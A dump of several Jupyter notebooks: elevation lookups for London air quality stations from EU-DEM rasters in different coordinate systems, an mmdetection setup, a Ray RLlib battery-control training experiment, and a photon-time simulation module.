84\",DATUM[\"WGS_1984\",SPHEROID[\"WGS 84\",6378137,298.257223563,AUTHORITY[\"EPSG\",\"7030\"]],AUTHORITY[\"EPSG\",\"6326\"]],PRIMEM[\"Greenwich\",0],UNIT[\"degree\",0.0174532925199433],AUTHORITY[\"EPSG\",\"4326\"]]\n\n>>> Complete!\n\n"
],
[
"# <EUDEMv11> Transform DEM from ETRS-89 GCS to OSGB-36 GCS.\n\nprint('\\n>>> <EUDEMv11> Transform DEM from ETRS-89 GCS to OSGB-36 GCS.')\n\npath = PATH_EUDEM\ndem_in = path + EUDEM_GCS_EU\ndem_out = path + EUDEM_GCS_UK\n\nepsg_in = EPSG_ETRS89\nepsg_out = EPSG_OSGB36\n\ntransprojcnvt_dem(dem_in, epsg_in, dem_out, epsg_out)\n\ndata = gdal.Open(dem_in)\nget_dem_info(data, if_print=True)\ndata = gdal.Open(dem_out)\nget_dem_info(data, if_print=True)\n\nprint('\\n>>> Complete!\\n')\n",
"\n>>> <EUDEMv11> Transform DEM from ETRS-89 GCS to OSGB-36 GCS.\n\nThe information of DEM:\nThe number of row (height) is: 30505\nThe number of column (width) is: 52428\nThe number of band is: 1\nThe 6 GeoTransform parameters are:\n (-12.266271034206424, 0.00033920980218715875, 0.0, 58.98761768429964, 0.0, -0.00033920980218715875)\nThe GCS/PCS information is:\n GEOGCS[\"ETRS89\",DATUM[\"European_Terrestrial_Reference_System_1989\",SPHEROID[\"GRS 1980\",6378137,298.2572221010002,AUTHORITY[\"EPSG\",\"7019\"]],TOWGS84[0,0,0,0,0,0,0],AUTHORITY[\"EPSG\",\"6258\"]],PRIMEM[\"Greenwich\",0],UNIT[\"degree\",0.0174532925199433],AUTHORITY[\"EPSG\",\"4258\"]]\n\nThe information of DEM:\nThe number of row (height) is: 30506\nThe number of column (width) is: 52430\nThe number of band is: 1\nThe 6 GeoTransform parameters are:\n (-12.266102928602475, 0.0003392475335051166, 0.0, 58.98812292836723, 0.0, -0.0003392475335051166)\nThe GCS/PCS information is:\n GEOGCS[\"OSGB 1936\",DATUM[\"OSGB_1936\",SPHEROID[\"Airy 1830\",6377563.396,299.3249646000044,AUTHORITY[\"EPSG\",\"7001\"]],TOWGS84[446.448,-125.157,542.06,0.15,0.247,0.842,-20.489],AUTHORITY[\"EPSG\",\"6277\"]],PRIMEM[\"Greenwich\",0],UNIT[\"degree\",0.0174532925199433],AUTHORITY[\"EPSG\",\"4277\"]]\n\n>>> Complete!\n\n"
],
[
"# Read London air quality monitoring station data file.\n\nprint('\\n>>> Read London air quality monitoring station data file.')\n\nsite_data = read_csv(PATH_LD_STATION_DATA)\nprint(site_data.head(3))\n\nsite_num = site_data['SiteName'].count()\nprint('\\n*==> The number of stations is: %d' % site_num)\n\n# Get the latitude and longitude of stations.\nsite_latlng = np.zeros((site_num, 2))\nsite_latlng[:, 0] = site_data['Latitude'] # The 0-th column - Latitude.\nsite_latlng[:, 1] = site_data['Longitude'] # The 1-th column - Longitude.\n\nnp.set_printoptions(suppress=True) # Print numbers without scientific notation.\nprint('\\n*==> The location (lat, lng) of stations are:\\n', site_latlng)\n\nprint('\\n>>> Complete!\\n')\n",
"\n>>> Read London air quality monitoring station data file.\n Unnamed: 0 api_data need_prediction historical_data Latitude Longitude \\\n0 BX9 True NaN True 51.465983 0.184877 \n1 BX1 True NaN True 51.465983 0.184877 \n2 BL0 True True True 51.522287 -0.125848 \n\n SiteType SiteName \n0 Suburban Bexley - Slade Green FDMS \n1 Suburban Bexley - Slade Green \n2 Urban Background Camden - Bloomsbury \n\n*==> The number of stations is: 24\n\n*==> The location (lat, lng) of stations are:\n [[51.46598327 0.18487713]\n [51.46598327 0.18487713]\n [51.522287 -0.125848 ]\n [51.52770662 -0.12905321]\n [51.544219 -0.175284 ]\n [51.51452534 -0.10451563]\n [51.51384718 -0.07776568]\n [51.410039 -0.127523 ]\n [51.490532 0.074003 ]\n [51.45258 0.070766 ]\n [51.486957 0.095111 ]\n [51.456357 0.040725 ]\n [51.4563 0.085606 ]\n [51.617327 -0.298775 ]\n [51.52078746 0.20546071]\n [51.48878 -0.441627 ]\n [51.52104675 -0.21349214]\n [51.52104675 -0.21349214]\n [51.474954 -0.039641 ]\n [51.56948433 0.08290747]\n [51.42525604 -0.34560829]\n [51.3892869 -0.14166153]\n [51.51504617 -0.00841849]\n [51.52254 -0.15459 ]]\n\n>>> Complete!\n\n"
],
[
"# <EUDEMv11> Get the elevation from DEM in WGS-84 GCS.\n\nprint('\\n>>> <EUDEMv11> Get the elevation from DEM in WGS-84 GCS.')\n\ndem_gcs = gdal.Open(PATH_EUDEM + EUDEM_GCS_WD)\nget_dem_info(dem_gcs, if_print=True)\n\nsite_ele_eudem_wgs = get_elevation(dem_gcs, site_latlng)\nnp.set_printoptions(suppress=True)\n\nprint('\\n*==> The elevation information of stations is:\\n', site_ele_eudem_wgs)\nprint('\\n*==> The elevation value of stations is:\\n', site_ele_eudem_wgs[:, 5].astype(int))\n\nprint('\\n>>> Complete!\\n')\n",
"\n>>> <EUDEMv11> Get the elevation from DEM in WGS-84 GCS.\n\nThe information of DEM:\nThe number of row (height) is: 30505\nThe number of column (width) is: 52428\nThe number of band is: 1\nThe 6 GeoTransform parameters are:\n (-12.266271034206424, 0.00033920980218715875, 0.0, 58.98761768429964, 0.0, -0.00033920980218715875)\nThe GCS/PCS information is:\n GEOGCS[\"WGS 84\",DATUM[\"WGS_1984\",SPHEROID[\"WGS 84\",6378137,298.257223563,AUTHORITY[\"EPSG\",\"7030\"]],AUTHORITY[\"EPSG\",\"6326\"]],PRIMEM[\"Greenwich\",0],UNIT[\"degree\",0.0174532925199433],AUTHORITY[\"EPSG\",\"4326\"]]\n\nThe 6 GeoTransform parameters of DEM are:\n (-12.266271034206424, 0.00033920980218715875, 0.0, 58.98761768429964, 0.0, -0.00033920980218715875)\n\n*==> The elevation information of stations is:\n [[ 0. 51.46598327 0.18487713 22174.\n 36706. 12.63551998]\n [ 1. 51.46598327 0.18487713 22174.\n 36706. 12.63551998]\n [ 2. 51.522287 -0.125848 22008.\n 35790. 37.60099411]\n [ 3. 51.52770662 -0.12905321 21992.\n 35781. 30.68862724]\n [ 4. 51.544219 -0.175284 21943.\n 35645. 61.01919174]\n [ 5. 51.51452534 -0.10451563 22031.\n 35853. 25.66654587]\n [ 6. 51.51384718 -0.07776568 22033.\n 35932. 29.40543556]\n [ 7. 51.410039 -0.127523 22339.\n 35785. 36.34508514]\n [ 8. 51.490532 0.074003 22102.\n 36379. 11.27258968]\n [ 9. 51.45258 0.070766 22214.\n 36370. 66.39667511]\n [ 10. 51.486957 0.095111 22112.\n 36442. 11.88549519]\n [ 11. 51.456357 0.040725 22202.\n 36281. 31.31890869]\n [ 12. 51.4563 0.085606 22203.\n 36414. 64.95016479]\n [ 13. 51.617327 -0.298775 21728.\n 35281. 79.23999786]\n [ 14. 51.52078746 0.20546071 22012.\n 36767. 7.36576653]\n [ 15. 51.48878 -0.441627 22107.\n 34859. 27.24001312]\n [ 16. 51.52104675 -0.21349214 22012.\n 35532. 25.52720642]\n [ 17. 51.52104675 -0.21349214 22012.\n 35532. 25.52720642]\n [ 18. 51.474954 -0.039641 22148.\n 36044. 14.32332325]\n [ 19. 51.56948433 0.08290747 21869.\n 36406. 15.99652195]\n [ 20. 51.42525604 -0.34560829 22294.\n 35142. 13.35388565]\n [ 21. 51.3892869 -0.14166153 22400.\n 35744. 32.15060806]\n [ 22. 51.51504617 -0.00841849 22029.\n 36136. 5.19105673]\n [ 23. 51.52254 -0.15459 22007.\n 35706. 36.85784912]]\n\n*==> The elevation value of stations is:\n [12 12 37 30 61 25 29 36 11 66 11 31 64 79 7 27 25 25 14 15 13 32 5 36]\n\n>>> Complete!\n\n"
],
[
"# <EUDEMv11> Get the elevation from DEM in OSGB-36 GCS.\n\nprint('\\n>>> <EUDEMv11> Get the elevation from DEM in OSGB-36 GCS.')\n\ndem_gcs = gdal.Open(PATH_EUDEM + EUDEM_GCS_UK)\nget_dem_info(dem_gcs, if_print=True)\n\nsite_ele_eudem_osgb = get_elevation(dem_gcs, site_latlng)\nnp.set_printoptions(suppress=True)\n\nprint('\\n*==> The elevation information of stations is:\\n', site_ele_eudem_osgb)\nprint('\\n*==> The elevation value of stations is:\\n', site_ele_eudem_osgb[:, 5].astype(int))\n\nprint('\\n>>> Complete!\\n')\n",
"\n>>> <EUDEMv11> Get the elevation from DEM in OSGB-36 GCS.\n\nThe information of DEM:\nThe number of row (height) is: 30506\nThe number of column (width) is: 52430\nThe number of band is: 1\nThe 6 GeoTransform parameters are:\n (-12.266102928602475, 0.0003392475335051166, 0.0, 58.98812292836723, 0.0, -0.0003392475335051166)\nThe GCS/PCS information is:\n GEOGCS[\"OSGB 1936\",DATUM[\"OSGB_1936\",SPHEROID[\"Airy 1830\",6377563.396,299.3249646000044,AUTHORITY[\"EPSG\",\"7001\"]],TOWGS84[446.448,-125.157,542.06,0.15,0.247,0.842,-20.489],AUTHORITY[\"EPSG\",\"6277\"]],PRIMEM[\"Greenwich\",0],UNIT[\"degree\",0.0174532925199433],AUTHORITY[\"EPSG\",\"4277\"]]\n\nThe 6 GeoTransform parameters of DEM are:\n (-12.266102928602475, 0.0003392475335051166, 0.0, 58.98812292836723, 0.0, -0.0003392475335051166)\n\n*==> The elevation information of stations is:\n [[ 0. 51.46598327 0.18487713 22173.\n 36702. 12.47727203]\n [ 1. 51.46598327 0.18487713 22173.\n 36702. 12.47727203]\n [ 2. 51.522287 -0.125848 22007.\n 35786. 37.75251389]\n [ 3. 51.52770662 -0.12905321 21991.\n 35776. 26.8823452 ]\n [ 4. 51.544219 -0.175284 21942.\n 35640. 58.50819397]\n [ 5. 51.51452534 -0.10451563 22030.\n 35849. 30.98666763]\n [ 6. 51.51384718 -0.07776568 22032.\n 35928. 32.92979813]\n [ 7. 51.410039 -0.127523 22338.\n 35781. 35.5172081 ]\n [ 8. 51.490532 0.074003 22101.\n 36375. 11.85224247]\n [ 9. 51.45258 0.070766 22213.\n 36365. 71.22161865]\n [ 10. 51.486957 0.095111 22111.\n 36437. 8.77665329]\n [ 11. 51.456357 0.040725 22201.\n 36277. 30.45423889]\n [ 12. 51.4563 0.085606 22202.\n 36409. 66.69743347]\n [ 13. 51.617327 -0.298775 21727.\n 35276. 78.91999817]\n [ 14. 51.52078746 0.20546071 22011.\n 36762. 8.10325527]\n [ 15. 51.48878 -0.441627 22106.\n 34855. 26.04798698]\n [ 16. 51.52104675 -0.21349214 22011.\n 35527. 24.9171505 ]\n [ 17. 51.52104675 -0.21349214 22011.\n 35527. 24.9171505 ]\n [ 18. 51.474954 -0.039641 22147.\n 36040. 8.97394276]\n [ 19. 51.56948433 0.08290747 21868.\n 36401. 16.96926498]\n [ 20. 51.42525604 -0.34560829 22293.\n 35138. 13.82033825]\n [ 21. 51.3892869 -0.14166153 22399.\n 35739. 32.94750977]\n [ 22. 51.51504617 -0.00841849 22028.\n 36132. 9.25135612]\n [ 23. 51.52254 -0.15459 22006.\n 35701. 35.54499435]]\n\n*==> The elevation value of stations is:\n [12 12 37 26 58 30 32 35 11 71 8 30 66 78 8 26 24 24 8 16 13 32 9 35]\n\n>>> Complete!\n\n"
],
[
"# <EUDEMv11> Get the elevation from DEM in ETRS-89 GCS.\n\nprint('\\n>>> <EUDEMv11> Get the elevation from DEM in ETRS-89 GCS.')\n\ndem_gcs = gdal.Open(PATH_EUDEM + EUDEM_GCS_EU)\nget_dem_info(dem_gcs, if_print=True)\n\nsite_ele_eudem_etrs = get_elevation(dem_gcs, site_latlng)\nnp.set_printoptions(suppress=True)\n\nprint('\\n*==> The elevation information of stations is:\\n', site_ele_eudem_etrs)\nprint('\\n*==> The elevation value of stations is:\\n', site_ele_eudem_etrs[:, 5].astype(int))\n\nprint('\\n>>> Complete!\\n')\n",
"\n>>> <EUDEMv11> Get the elevation from DEM in ETRS-89 GCS.\n\nThe information of DEM:\nThe number of row (height) is: 30505\nThe number of column (width) is: 52428\nThe number of band is: 1\nThe 6 GeoTransform parameters are:\n (-12.266271034206424, 0.00033920980218715875, 0.0, 58.98761768429964, 0.0, -0.00033920980218715875)\nThe GCS/PCS information is:\n GEOGCS[\"ETRS89\",DATUM[\"European_Terrestrial_Reference_System_1989\",SPHEROID[\"GRS 1980\",6378137,298.2572221010002,AUTHORITY[\"EPSG\",\"7019\"]],TOWGS84[0,0,0,0,0,0,0],AUTHORITY[\"EPSG\",\"6258\"]],PRIMEM[\"Greenwich\",0],UNIT[\"degree\",0.0174532925199433],AUTHORITY[\"EPSG\",\"4258\"]]\n\nThe 6 GeoTransform parameters of DEM are:\n (-12.266271034206424, 0.00033920980218715875, 0.0, 58.98761768429964, 0.0, -0.00033920980218715875)\n\n*==> The elevation information of stations is:\n [[ 0. 51.46598327 0.18487713 22174.\n 36706. 12.63551998]\n [ 1. 51.46598327 0.18487713 22174.\n 36706. 12.63551998]\n [ 2. 51.522287 -0.125848 22008.\n 35790. 37.60099411]\n [ 3. 51.52770662 -0.12905321 21992.\n 35781. 30.68862724]\n [ 4. 51.544219 -0.175284 21943.\n 35645. 61.01919174]\n [ 5. 51.51452534 -0.10451563 22031.\n 35853. 25.66654587]\n [ 6. 51.51384718 -0.07776568 22033.\n 35932. 29.40543556]\n [ 7. 51.410039 -0.127523 22339.\n 35785. 36.34508514]\n [ 8. 51.490532 0.074003 22102.\n 36379. 11.27258968]\n [ 9. 51.45258 0.070766 22214.\n 36370. 66.39667511]\n [ 10. 51.486957 0.095111 22112.\n 36442. 11.88549519]\n [ 11. 51.456357 0.040725 22202.\n 36281. 31.31890869]\n [ 12. 51.4563 0.085606 22203.\n 36414. 64.95016479]\n [ 13. 51.617327 -0.298775 21728.\n 35281. 79.23999786]\n [ 14. 51.52078746 0.20546071 22012.\n 36767. 7.36576653]\n [ 15. 51.48878 -0.441627 22107.\n 34859. 27.24001312]\n [ 16. 51.52104675 -0.21349214 22012.\n 35532. 25.52720642]\n [ 17. 51.52104675 -0.21349214 22012.\n 35532. 25.52720642]\n [ 18. 51.474954 -0.039641 22148.\n 36044. 14.32332325]\n [ 19. 51.56948433 0.08290747 21869.\n 36406. 15.99652195]\n [ 20. 51.42525604 -0.34560829 22294.\n 35142. 13.35388565]\n [ 21. 51.3892869 -0.14166153 22400.\n 35744. 32.15060806]\n [ 22. 51.51504617 -0.00841849 22029.\n 36136. 5.19105673]\n [ 23. 51.52254 -0.15459 22007.\n 35706. 36.85784912]]\n\n*==> The elevation value of stations is:\n [12 12 37 30 61 25 29 36 11 66 11 31 64 79 7 27 25 25 14 15 13 32 5 36]\n\n>>> Complete!\n\n"
],
[
"# Compare the elevation obtained from different DEMs.\n\nprint('\\n>>> Compare the elevation obtained from different DEMs.')\n\nprint('\\nEUDEMv11_WD', site_ele_eudem_wgs[:, 5].astype(int))\nprint('\\nEUDEMv11_UK', site_ele_eudem_osgb[:, 5].astype(int))\nprint('\\nEUDEMv11_EU', site_ele_eudem_etrs[:, 5].astype(int))\n\nprint('\\n>>> Complete!\\n')\n",
"\n>>> Compare the elevation obtained from different DEMs.\n\nEUDEMv11_WD [12 12 37 30 61 25 29 36 11 66 11 31 64 79 7 27 25 25 14 15 13 32 5 36]\n\nEUDEMv11_UK [12 12 37 26 58 30 32 35 11 71 8 30 66 78 8 26 24 24 8 16 13 32 9 35]\n\nEUDEMv11_EU [12 12 37 30 61 25 29 36 11 66 11 31 64 79 7 27 25 25 14 15 13 32 5 36]\n\n>>> Complete!\n\n"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
e706abda776e1137a2f2c187f2142bde394f8a40 | 1,134 | ipynb | Jupyter Notebook | Untitled.ipynb | Yusoi/mmdetection | cbb5fb00f6e124fbb2c15e7e3438d7fa76b8850a | [
"Apache-2.0"
] | null | null | null | Untitled.ipynb | Yusoi/mmdetection | cbb5fb00f6e124fbb2c15e7e3438d7fa76b8850a | [
"Apache-2.0"
] | null | null | null | Untitled.ipynb | Yusoi/mmdetection | cbb5fb00f6e124fbb2c15e7e3438d7fa76b8850a | [
"Apache-2.0"
] | null | null | null | 22.235294 | 68 | 0.580247 | [
[
[
"from mmdet.apis import init_detector, inference_detector\nimport mmcv\n\n# Specify the path to model config and checkpoint file\nconfig_file = 'configs/custom/mask_rcnn_r50_fpn_1x_coco.py'\n\n# build the model from a config file and a checkpoint file\nmodel = init_detector(config_file, device='cuda:0')",
"_____no_output_____"
]
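,
[
"# Hedged usage sketch for the imported inference_detector ('demo.jpg' is a\n# hypothetical image path).\n# result = inference_detector(model, 'demo.jpg')\n# model.show_result('demo.jpg', result)",
"_____no_output_____"
]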
]
] | [
"code"
] | [
[
"code"
]
] |
e706b82d31613a116fc3d7a7d8ae08e04b8c0ae7 | 12,539 | ipynb | Jupyter Notebook | notebooks/exploratory/rdnfn_018_callback_test.ipynb | rdnfn/solar-agent | 630ce26816f5dfccb3c4662c683c59e4a362aef6 | [
"MIT"
] | 4 | 2021-05-19T13:30:13.000Z | 2022-02-07T22:54:12.000Z | notebooks/exploratory/rdnfn_018_callback_test.ipynb | rdnfn/solar-agent | 630ce26816f5dfccb3c4662c683c59e4a362aef6 | [
"MIT"
] | null | null | null | notebooks/exploratory/rdnfn_018_callback_test.ipynb | rdnfn/solar-agent | 630ce26816f5dfccb3c4662c683c59e4a362aef6 | [
"MIT"
] | 2 | 2021-05-19T13:31:23.000Z | 2021-07-01T14:02:16.000Z | 37.768072 | 531 | 0.522131 | [
[
[
"# Experiment Collection #01\n\nThis notebook contains experiments regarding the use of a penalty term.",
"_____no_output_____"
],
[
"## 1. Basic Setup",
"_____no_output_____"
]
],
[
[
"# Jupyter setup\n%load_ext autoreload\n%autoreload 2\n%config IPCompleter.greedy=True",
"_____no_output_____"
],
[
"import ray\nray.shutdown()",
"_____no_output_____"
],
[
"import ray\nimport ray.rllib\nimport ray.tune \nimport solara.envs.creator\n\n## Initialising ray (starts background process for distributed computing)\nray.shutdown()\nray.init(logging_level=\"WARNING\", object_store_memory= 25 * 10**9)\n\n# Adding environment creator function to ray\nray.tune.registry.register_env(\"battery_control\", solara.envs.creator.create_env)",
"_____no_output_____"
]
],
[
[
"## 2. Experiment Definition",
"_____no_output_____"
]
],
[
[
"from solara.constants import PROJECT_PATH\n\n# RL environment configuration\nENV_CONFIG = {\n 'general': {\n 'type': 'battery_control.BatteryControlEnv',\n 'infeasible_control_penalty': ray.tune.grid_search([False, True]),\n 'grid_charging': ray.tune.grid_search([True, False]),\n 'logging_level': \"RAY\", # if using RLlib, set to 'RAY'\n },\n 'components': {\n 'battery': {\n 'type': 'LithiumIonBattery',\n 'size': 10,\n 'chemistry': 'NMC',\n 'time_step_len': 1,\n },\n 'solar': {\n 'type': 'DataPV',\n 'data_path': PROJECT_PATH + \"/data/solar_trace_data/PV_5796.txt\",\n 'fixed_sample_num': 12,\n },\n 'load': {\n 'type': 'DataLoad',\n 'data_path': PROJECT_PATH + \"/data/solar_trace_data/load_5796.txt\",\n 'fixed_sample_num': 12,\n },\n 'grid': {\n 'type': 'PeakGrid',\n 'peak_threshold': 1.0,\n },\n },\n}\n\n# RL agent configuration\nAGENT_CONFIG = {\n \"framework\": \"torch\",\n #\"num_workers\": 9,\n #\"num_gpus\": 1,\n \"env\": \"battery_control\",\n \"env_config\": ENV_CONFIG,\n \"gamma\": 0.9999999,\n \"log_level\": \"WARNING\",\n \"lr\": 5e-5,\n \"model\": {\n \"fcnet_hiddens\": [256, 256, 256, 256],\n \"fcnet_activation\": \"relu\",\n \"post_fcnet_activation\": \"tanh\",\n },\n}\n\n# Full experiment configuration including RL algorithm type\nEXPERIMENT_CONFIG = {\n \"run_or_experiment\": \"PPO\",\n \"config\": AGENT_CONFIG,\n \"stop\": {\"training_iteration\": 2},\n \"local_dir\": \"./tmp/tune/\",\n \"log_to_file\": True,\n \"checkpoint_freq\": 1,\n}",
"_____no_output_____"
],
[
"# Parallelisation Setup\nif False:\n num_workers = 4\n gpu_count = 1\n reserved_capacity = 0.01 # Driver GPU\n num_gpus_per_worker = (gpu_count - reserved_capacity) / num_workers\n\n\n AGENT_CONFIG[\"num_workers\"] = num_workers\n AGENT_CONFIG[\"num_gpus\"] = num_gpus\n AGENT_CONFIG[\"num_envs_per_worker\"]= 8\n \n\n#AGENT_CONFIG[\"num_gpus\"] = 1\n#AGENT_CONFIG[\"num_envs_per_worker\"]= 8\nAGENT_CONFIG[\"num_workers\"] = 10\nAGENT_CONFIG[\"num_gpus\"] = 1\n#AGENT_CONFIG[\"remote_worker_envs\"]= True",
"_____no_output_____"
],
[
"from ray.rllib.evaluation import RolloutWorker\n\nfrom ray.rllib.env import BaseEnv\nfrom ray.rllib.policy import Policy\nfrom ray.rllib.policy.sample_batch import SampleBatch\nfrom ray.rllib.evaluation import MultiAgentEpisode\nfrom ray.rllib.utils.annotations import PublicAPI\nfrom ray.rllib.utils.deprecation import deprecation_warning\nfrom ray.rllib.utils.typing import AgentID, PolicyID\n\nfrom typing import Dict, Optional, TYPE_CHECKING\n\nimport numpy as np\n\n\nclass MyCallbacks(ray.rllib.agents.callbacks.DefaultCallbacks):\n \"\"\"Callback to add additional metrics over the training process from step infos.\"\"\"\n \n info_keys = [\"cost\", \"power_diff\", \"battery_cont\"]\n \n def on_episode_start(self, *, worker: RolloutWorker, base_env: BaseEnv,\n policies: Dict[str, Policy],\n episode: MultiAgentEpisode, env_index: int, **kwargs):\n \n episode.user_data[\"infos\"] = []\n\n def on_episode_step(self, *, worker: RolloutWorker, base_env: BaseEnv,\n episode: MultiAgentEpisode, env_index: int, **kwargs):\n \n episode.user_data[\"infos\"].append(episode.last_info_for())\n\n def on_episode_end(self, *, worker: RolloutWorker, base_env: BaseEnv,\n policies: Dict[str, Policy], episode: MultiAgentEpisode,\n env_index: int, **kwargs):\n \n for key in self.info_keys:\n if key in episode.user_data[\"infos\"][0].keys():\n key_data = [info[key] for info in episode.user_data[\"infos\"]]\n episode.custom_metrics[key] = sum(key_data)\n \nAGENT_CONFIG[\"callbacks\"] = MyCallbacks\n#AGENT_CONFIG.pop(\"callbacks\")",
"_____no_output_____"
],
[
"reporter = ray.tune.JupyterNotebookReporter(overwrite=True)\nreporter.add_metric_column(\"custom_metrics/cost_mean\")\nreporter.add_metric_column(\"custom_metrics/power_diff_mean\")\n\nanalysis = ray.tune.run(\n progress_reporter=reporter,\n **EXPERIMENT_CONFIG,\n#resume=True\n)",
"_____no_output_____"
],
[
"ray.tune.JupyterNotebookReporter(overwrite=True).DEFAULT_COLUMNS",
"_____no_output_____"
],
[
"ray.rllibJupyterNotebookReporterainer",
"_____no_output_____"
],
[
"analysis.results",
"_____no_output_____"
],
[
"ray.rllib.agents.ppo.PPOTrainer(config=AGENT_CONFIG)",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
e706c0fde2111ce2617dd815573e4bb93b186d55 | 33,207 | ipynb | Jupyter Notebook | nbs/04_simulation.ipynb | tburnett/wtlike | 0a0f0c807fd32a625f653c94be83b093b9abec5d | [
"Apache-2.0"
] | 3 | 2020-12-27T02:49:00.000Z | 2022-03-20T07:20:53.000Z | nbs/04_simulation.ipynb | tburnett/wtlike | 0a0f0c807fd32a625f653c94be83b093b9abec5d | [
"Apache-2.0"
] | 3 | 2021-05-20T23:14:35.000Z | 2022-02-26T10:25:25.000Z | nbs/04_simulation.ipynb | tburnett/wtlike | 0a0f0c807fd32a625f653c94be83b093b9abec5d | [
"Apache-2.0"
] | 1 | 2021-11-15T10:23:22.000Z | 2021-11-15T10:23:22.000Z | 72.822368 | 19,932 | 0.780197 | [
[
[
"# default_exp simulation\nfrom nbdev import *\nfrom utilities.ipynb_docgen import *\n\n%reload_ext autoreload\n%autoreload 2",
"_____no_output_____"
]
],
[
[
"# Simulation\n> Generate simulated data",
"_____no_output_____"
]
],
[
[
"# export\nimport os\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom scipy import stats\n\nfrom wtlike.config import Config\nfrom wtlike.weights import PointSource",
"_____no_output_____"
],
[
"# export\nimport numbers\n\nclass _Sampler():\n \"\"\" Sample an arbitrary function or histogram\n\n - func -- a function, a histogram, or a fixed value<br>\n If a function, must be positive definite.<br>\n Assume histogram bins are 0 to 1.\n - a,b -- limits (default 0,1)\n - n -- table size (ignored if a histogram or value)\n\n \"\"\"\n\n def __init__(self, func, limits=(0,1), n=100):\n\n a,b = limits\n self.x = np.linspace(a,b,n+1) # bin edges\n dx = (b-a)/(n)/2\n self.deltafun=None\n\n if callable(func):\n # A function\n # evaluate at bin centers\n y = np.array([func(t-dx) for t in self.x])\n if np.any(y<0) or np.sum(y)==0:\n raise ValueError('Function is not positive definite')\n elif isinstance(func, numbers.Number):\n # a single value, or delta function\n self.deltafun = func\n if func<0 or func>1:\n raise ValueError('Value not in range [0,1]')\n self.mean=func\n return\n else:\n n = len(func)\n self.x = np.linspace(a,b,n)\n y = func\n cy = np.cumsum(y)\n d = cy[-1]-cy[0]\n self.sy = (cy-cy[0])/d\n\n self.mean = np.sum( (self.x-dx) * y) / d\n\n def _evaluate(self, r):\n \"\"\"evaluate inverse integral. expect 0<r<1 \"\"\"\n return np.interp(r, self.sy, self.x)\n\n def __call__(self, size):\n \"\"\"Generate `size` values\n \"\"\"\n if self.deltafun: return np.full(size, self.deltafun)\n\n return self._evaluate(stats.uniform.rvs(size=size))",
"_____no_output_____"
]
],
[
[
"### Gaussian and quadratic example functions\n",
"_____no_output_____"
]
],
[
[
"# collapse_input\nn = 20\nsf = _Sampler(lambda x: np.exp(-(x**2)/2), limits=(-4, 4) )\n\ndata = sf(10000)\ntests = np.array([np.abs(data.mean()), np.abs(data.std()-1) ])\nassert np.all(tests<5e-2 ), f'Failed Tests: mean {data.mean()}, std {data.std()}'\n\nfunc = lambda x: x**2\nwfun = _Sampler(func)\n\ntest2 = wfun.mean, np.mean(wfun(1000))\nassert np.abs( test2[0]-test2[1] ) < 1e-1, f'Not almost equal: {test2}'",
"_____no_output_____"
]
],
[
[
"### Test generating weights from a source weight histogram",
"_____no_output_____"
],
[
"Test with a function peaked at both ends, generate equal signal and background",
"_____no_output_____"
],
[
"## Simulate times and weights",
"_____no_output_____"
]
],
[
[
"# export\nsec_per_day = 24*3600\n\ndef generate_times(start, stop, count):\n \"\"\" Generate a list of times, distributed randomly\n\n - start, stop: times\n - count : expected number to generate with rate=count/(stop-start)\n\n returns : list of times between start and stop. Note that the actual number is Poisson-distributed\n \"\"\"\n # note: can speed this up by making groups of random calls\n\n tt =[]\n t = start\n scale = (stop-start)/count\n while True:\n t += np.random.exponential(scale =scale)\n if t>stop: break\n tt.append(t)\n return tt",
"_____no_output_____"
],
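[
"# Editor's sketch (assumption): the vectorized speed-up hinted at in the comment above --\n# draw all exponential gaps in one call, cumulative-sum them, and truncate at stop.\n# The overdraw margin makes running short very unlikely; redraw if it ever happens.\ndef generate_times_vectorized(start, stop, count):\n scale = (stop-start)/count\n n_draw = int(count + 5*count**0.5) + 10\n gaps = np.random.exponential(scale=scale, size=n_draw)\n tt = start + np.cumsum(gaps)\n return list(tt[tt<stop])\n\nlen(generate_times_vectorized(0, 1, 1000))",
"_____no_output_____"
],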
[
"t = np.random.exponential(1, 100); \n#dt = np.diff(t); pd.Series.describe(dt)\ndt = np.diff(t)\npd.Series(dt).describe()",
"_____no_output_____"
],
[
"#export\nclass WeightFunction(object):\n\n def __init__(self, s=1,b=1, wt_signif=0.1):\n self.s = s\n self.b = b\n self.lam = wt_signif\n\n def __call__(self, r):\n return (self.s * np.exp(-r/self.lam)/(self.lam*(1-np.exp(-1/self.lam))) + self.b)\n\n def sample(self, s,b, n):\n self.s = s\n self.b = b\n return _Sampler(self, n=1000)(n);\n\n def weights(self, s, b, n):\n h = self.sample(s,b,n)\n return 1-b/self(h)",
"_____no_output_____"
],
[
"#hide\n# test weight function\ns,b, lam = 1,1,0.1\n\nr = np.linspace(0,1, 1000) \nwfun = WeightFunction(s=s,b=b,wt_signif=lam)\nsamp = wfun.sample(s,b, 10000); \nwts = wfun.weights(s,b, 10000);\n\n\nfig, (ax1, ax2, ax3) = plt.subplots(1,3, figsize=(15,4), sharex=True)\nax1.plot(r, wfun(r), '-')\nax1.set(ylim=(0,None), xlim=(0,1), title='function');\nax2.hist(samp, 100);\nax2.set(title='sampled', xlabel='zeta value');\nax3.hist(wts, bins=np.linspace(0,1,101));\nax3.set(title='weights');",
"_____no_output_____"
],
[
"#export\ndef make_exposure(fexp, start, stop, interval=300):\n \"\"\"\n - fexp -- exposure in cm^2, a value or a function of time in day units\n - start, stop -- range of time in day units\n - interval [300] -- 5-min interval (fermi data is 30 s)\n\n Returns: a DataFrame with start, stop, exp\n \"\"\"\n def check_scalar( f):\n if np.isscalar(f):\n fval = f\n return lambda t: fval\n return f\n fexp = check_scalar(fexp)\n\n nbins = int((stop-start)*sec_per_day / interval)\n edges = np.linspace(start, start+nbins*interval/sec_per_day, nbins+1)\n starts, stops = edges[:-1], edges[1:]\n exp = fexp(starts) * interval\n return pd.DataFrame.from_dict(dict(start=starts, stop=stops, exp=exp))\n\n# exp = make_exposure(500, 0, 1 )\n# days = np.sum(exp.stop-exp.start); secs = days*24*3600\n# exptot=np.sum(exp.exp)\n# exp_text = f' average {exptot/secs:.0f} cm^2 for {secs/1e6:.1f} Ms'\n# print(exp_text)\n# exp.head()",
"_____no_output_____"
],
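[
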